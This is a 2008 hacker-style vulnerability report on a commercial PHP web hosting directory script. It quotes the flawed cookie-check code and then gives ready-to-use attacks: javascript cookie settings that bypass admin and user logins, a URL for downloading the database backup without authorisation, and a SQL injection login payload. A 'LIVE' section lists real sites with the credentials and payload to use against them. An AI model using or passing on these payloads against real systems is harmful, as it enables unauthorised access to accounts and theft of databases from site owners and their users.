[&#187;] Script: [ Turnkeyforms Web Hosting Directory ] [&#187;] Language: [ PHP ] [&#187;] Website: [ http://www.turnkeyforms.com/web-hosting-directory.html ] [&#187;] Type: [ Commercial ] [&#187;] Report-Date: [ 12.11.2008 ] [&#187;] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] ===[ DTLZ ]=== [0] Insecure Cookie Handling # if ($_COOKIE['adm'] == 1) # { # if ($request[1] == 'logout') # { # setcookie ("adm", "0"); # java_redirect($config['base_url']."admin/?".time()); # } # $t->assign('logged', 1); # } # else { # if ($request[1] == 'login' && $vars['passwd'] == $config['WebInterfacePassword']) # { # setcookie ("adm", "1"); # java_redirect($config['base_url']."admin/?".time()); # } # $t->assign('logged', 0); # } [!] admin Auth bypass, panel => http://localhost/[paht]/admin/ [&#187;] javascript:document.cookie = "adm=1"; [!] users Auth bypass [&#187;] javascript:document.cookie = "logged=[username]"; javascript:document.cookie = "logged=g4n0k"; [1] Arbitrary Database Backup [!] we can download a Backup of Database. [&#187;] http://localhost/[paht]/admin/backup/db [2] SQLi Auth Bypass [&#187;] Username : [a_valid_username] [&#187;] Password : ' OR '1=1-- ===[ LIVE ]=== [&#187;] http://www.webhosting-directory.demo.turnkeyforms.com/admin/ [&#187;] http://www.webhosting-directory.demo.turnkeyforms.com/admin/backup/db [&#187;] http://tophostingdirectory.com username: ideas password: ' OR '1=1-- javascript:document.cookie = "logged=ideas"; ===[ Greetz ]=== [&#187;] ALLAH [&#187;] Tornado2800 <Tornado2800[at]gmail.com> [&#187;] Hussain-X <darkangel_g85[at]yahoo.com> //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =========== exit(); ===========